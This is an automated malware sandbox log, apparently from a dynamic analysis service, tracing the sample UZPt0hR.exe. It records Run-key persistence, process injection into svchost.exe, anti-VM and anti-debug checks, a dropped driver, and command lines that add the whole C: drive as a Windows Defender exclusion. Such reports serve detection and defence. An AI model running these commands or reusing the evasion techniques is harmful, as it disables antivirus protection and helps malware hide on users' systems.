                    Source: C:\Windows\System32\svchost.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run {57F06FF0-B2D5-45F3-BFEE-970F76E38EFD}

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\System32\svchost.exe | File deleted: c:\users\user\desktop\uzpt0hr.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002684C488830 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddressForCaller,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddressForCaller,GetProcAddress,LoadLibraryExW,GetProcAddressForCaller,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,5_2_000002684C488830
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\{42F09F7D-CA44-409E-A936-E948CF4ECA66} {875376CD-1334-41AA-8A36-0C7105D31883}
                    Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\UZPt0hR.exe | System information queried: FirmwareTableInformation
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | System information queried: FirmwareTableInformation
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | System information queried: FirmwareTableInformation
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | System information queried: FirmwareTableInformation
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | System information queried: FirmwareTableInformation
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | System information queried: FirmwareTableInformation
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | API/Special instruction interceptor: Address: 66CAA1
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | API/Special instruction interceptor: Address: 640B79
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | API/Special instruction interceptor: Address: 64C4C0
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | API/Special instruction interceptor: Address: 67ED87
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | API/Special instruction interceptor: Address: 6404DD
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | API/Special instruction interceptor: Address: 64A84B
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | API/Special instruction interceptor: Address: 62525A
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | API/Special instruction interceptor: Address: 62468A
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | API/Special instruction interceptor: Address: 674DEF
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | API/Special instruction interceptor: Address: 64657B
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | API/Special instruction interceptor: Address: 6736BC
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | API/Special instruction interceptor: Address: 7FF9105CE814
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Special instruction interceptor: First address: 674929 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Special instruction interceptor: First address: 140423438 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Special instruction interceptor: First address: 1402AC77B instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Code function: 0_2_005020A6 rdtsc 0_2_005020A6
                    Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002684C48DE00 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,Process32NextW,CloseHandle,5_2_000002684C48DE00
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3731
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6013
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8292
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1283
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7300
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2247
                    Source: C:\Windows\System32\svchost.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_5-19650
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Dropped PE file which has not been started: C:\Windows\Temp\K47ZW3T_7928.sys
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_0-10725
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | API coverage: 6.6 %
                    Source: C:\Windows\System32\svchost.exe | API coverage: 8.0 %
                    Source: C:\Windows\System32\svchost.exe TID: 1440 | Thread sleep count: 47 > 30
                    Source: C:\Windows\System32\svchost.exe TID: 1440 | Thread sleep time: -141000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 6980 | Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7228 | Thread sleep count: 3731 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7228 | Thread sleep count: 6013 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7260 | Thread sleep time: -8301034833169293s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8180 | Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7008 | Thread sleep time: -8301034833169293s >= -30000s
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                    Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                    Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002684C4797F0 SHGetKnownFolderPath,lstrlenW,CoTaskMemFree,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,5_2_000002684C4797F0
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 15_2_008235CC FindFirstFileA,FindNextFileA,FindClose,15_2_008235CC
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 15_2_00841C54 __doserrno,_errno,_errno,__doserrno,FindFirstFileA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,15_2_00841C54
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 15_2_007D5BCC GetCurrentProcess,GetProcessAffinityMask,GetSystemInfo,15_2_007D5BCC
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: w32tm.exe, 00000012.00000002.1501190118.00000000004C7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
                    Source: svchost.exe, 00000005.00000002.2446911674.000002684AA99000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 00000005.00000002.2446911674.000002684AA99000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWRSVP TCPv6 Service Provider
                    Source: svchost.exe, 00000005.00000002.2446684624.000002684AA7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                    Source: svchost.exe, 00000005.00000002.2446368757.000002684AA33000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@
                    Source: UZPt0hR.exe, 00000000.00000002.1217880005.0000000000915000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000002.1474919843.0000000000533000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: svchost.exe, 00000005.00000002.2446684624.000002684AA64000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | API call chain: ExitProcess graph end node graph_0-10682
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | API call chain: ExitProcess graph end node graph_0-10739
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | API call chain: ExitProcess graph end node graph_0-10736
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | API call chain: ExitProcess graph end node graph_0-10730
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | API call chain: ExitProcess graph end node graph_0-10748
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | API call chain: ExitProcess graph end node graph_0-10726
                    Source: C:\Windows\System32\svchost.exe | API call chain: ExitProcess graph end node graph_5-19612
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | API call chain: ExitProcess graph end node graph_15-53224
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | API call chain: ExitProcess graph end node graph_15-53188
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Code function: 0_2_005020A6 rdtsc 0_2_005020A6
                    Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002684C49C5E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_000002684C49C5E0
                    Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002684C48DE00 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,Process32NextW,CloseHandle,5_2_000002684C48DE00
                    Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002684C488830 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddressForCaller,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddressForCaller,GetProcAddress,LoadLibraryExW,GetProcAddressForCaller,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,5_2_000002684C488830
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Code function: 0_2_0066D47C mov ecx, dword ptr fs:[00000030h] 0_2_0066D47C
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 15_2_00849204 GetProcessHeap,HeapAlloc,_errno,_errno,__doserrno,_errno,GetProcessHeap,HeapFree,SetEndOfFile,_errno,__doserrno,GetLastError,15_2_00849204
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                    Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002684C49E5B8 SetUnhandledExceptionFilter,5_2_000002684C49E5B8
                    Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002684C49C5E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_000002684C49C5E0
                    Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002684C4A0E94 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_000002684C4A0E94
                    Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002684C49A818 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_000002684C49A818
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 15_2_0083C280 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_0083C280
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 15_2_0083C540 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_0083C540
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00839924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00839924
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00839B18 SetUnhandledExceptionFilter,15_2_00839B18

                    HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\svchost.exe | File created: tzutil.exe.5.dr
Source: C:\Users\user\Desktop\UZPt0hR.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:'
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
Source: C:\Users\user\Desktop\UZPt0hR.exe | Code function: 0_2_00406DB0 GetCurrentProcess,_memset,CreateProcessW,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,_memset,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle,0_2_00406DB0
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | NtProtectVirtualMemory: Direct from: 0x1402EF4A5
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | NtQuerySystemInformation: Direct from: 0x1402FD4DB
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | NtQuerySystemInformation: Direct from: 0x14030DE30
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | NtProtectVirtualMemory: Direct from: 0x1400026B1
Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | NtProtectVirtualMemory: Direct from: 0x140248445
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | NtQuerySystemInformation: Direct from: 0x14031CF25
Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | NtProtectVirtualMemory: Direct from: 0x140177DE3
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | NtProtectVirtualMemory: Direct from: 0x1402538C4
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | NtProtectVirtualMemory: Direct from: 0x1402EF4AC
Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | NtProtectVirtualMemory: Direct from: 0x140225E44
Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | NtQuerySystemInformation: Direct from: 0x140232AC0
Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | NtProtectVirtualMemory: Direct from: 0x14022B9FE
Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | NtQuerySystemInformation: Direct from: 0x140166C45
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | NtQuerySystemInformation: Direct from: 0x1402FB49E
Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | NtQuerySystemInformation: Direct from: 0x140239FF3
Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | NtQuerySystemInformation: Direct from: 0x1402412BC
Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | NtProtectVirtualMemory: Direct from: 0x140168DD1
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | NtProtectVirtualMemory: Direct from: 0x140328F65
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | NtQuerySystemInformation: Direct from: 0x1403071A7
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | NtProtectVirtualMemory: Direct from: 0x1404215FB
Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | NtQuerySystemInformation: Direct from: 0x14029D239
Source: C:\Users\user\Desktop\UZPt0hR.exe | Section loaded: NULL target: C:\Windows\System32\svchost.exe protection: read write
Source: C:\Users\user\Desktop\UZPt0hR.exe | Section loaded: NULL target: C:\Windows\System32\svchost.exe protection: execute and read and write
Source: C:\Users\user\Desktop\UZPt0hR.exe | Section loaded: NULL target: C:\Windows\System32\svchost.exe protection: read write
Source: C:\Users\user\Desktop\UZPt0hR.exe | Code function: 0_2_004043D0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,0_2_004043D0
Source: C:\Users\user\Desktop\UZPt0hR.exe | Code function: 0_2_004044A0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,0_2_004044A0
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002684C4742E0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,5_2_000002684C4742E0
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002684C4743D0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,5_2_000002684C4743D0
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002684C47A3B0 setsockopt,SetEvent,LocalAlloc,wnsprintfW,LocalAlloc,lstrcpyW,LocalAlloc,lstrcpyW,CoInitializeEx,ShellExecuteExW,GetLastError,CoUninitialize,LocalAlloc,wnsprintfW,CreateProcessW,OpenEventW,SetEvent,CloseHandle,LocalFree,LocalFree,OpenEventW,SetEvent,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,shutdown,closesocket,5_2_000002684C47A3B0
Source: C:\Users\user\Desktop\UZPt0hR.exe | Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
